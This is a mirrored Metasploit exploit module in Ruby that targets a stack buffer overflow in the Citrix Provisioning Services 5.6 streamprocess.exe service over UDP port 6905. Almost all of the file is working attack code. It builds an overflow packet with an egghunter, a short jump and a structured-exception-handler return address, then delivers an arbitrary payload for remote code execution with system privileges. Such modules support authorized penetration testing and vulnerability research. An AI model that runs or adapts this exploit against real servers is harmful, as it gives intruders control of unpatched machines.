Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::Remote::Udp
10
include Msf::Exploit::Remote::Egghunter
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.
19
By sending a specially crafted packet to the Provisioning Services server, a fixed
20
length buffer on the stack can be overflowed and arbitrary code can be executed.
21
},
22
'Author' => 'mog',
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'OSVDB', '70597'],
26
[ 'ZDI', '11-023' ],
27
[ 'URL', 'http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/' ],
28
[ 'URL', 'http://support.citrix.com/article/CTX127149' ],
29
],
30
'DefaultOptions' => {
31
# best at delaying/preventing target crashing post-exploit
32
'EXITFUNC' => 'process',
33
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
34
},
35
'Payload' => {
36
'BadChars' => "\x00", # Only "\x00\x00" breaks the overflow, but this is safer
37
},
38
'Platform' => 'win',
39
'Targets' => [
40
# pop/pop/ret in streamprocess.exe
41
# Service runs and automatically shuts down in Win 7
42
[ 'Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista', { 'Ret' => 0x00423d32 } ],
43
],
44
'Privileged' => true,
45
'DefaultTarget' => 0,
46
'DisclosureDate' => '2011-01-20',
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options([Opt::RPORT(6905)])
56
end
57
58
def exploit
59
eggoptions =
60
{
61
:checksum => true,
62
:eggtag => 'W00t',
63
}
64
hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
65
66
sploit = "\x10\x00\x02\x40" # message type
67
sploit << rand_text_alpha_upper(30)
68
sploit << "\x00\x01\x00\x00" # length field
69
sploit << rand_text_alpha_upper(400)
70
sploit << hunter
71
sploit << rand_text_alpha_upper(64 - hunter.length)
72
73
sploit << "\xEB\xBE" # Jump back 66 bytes to hunter because there's
74
sploit << rand_text_alpha_upper(2) # only 24 bytes of cyclic copy after ret
75
sploit << [target.ret].pack('V') # SE handler
76
77
sploit << rand_text_alpha_upper(50) # Need >= 24 bytes to keep the tag out of the stack
78
sploit << egg # Payload has a whole page to itself
79
80
print_status("Trying target #{target.name}...")
81
82
connect_udp
83
udp_sock.put(sploit)
84
print_status("Exploit sent, wait for egghunter.")
85
select(nil, nil, nil, 4) # takes about 8 seconds in tests
86
87
handler(udp_sock)
88
disconnect_udp
89
end
90
end
91
92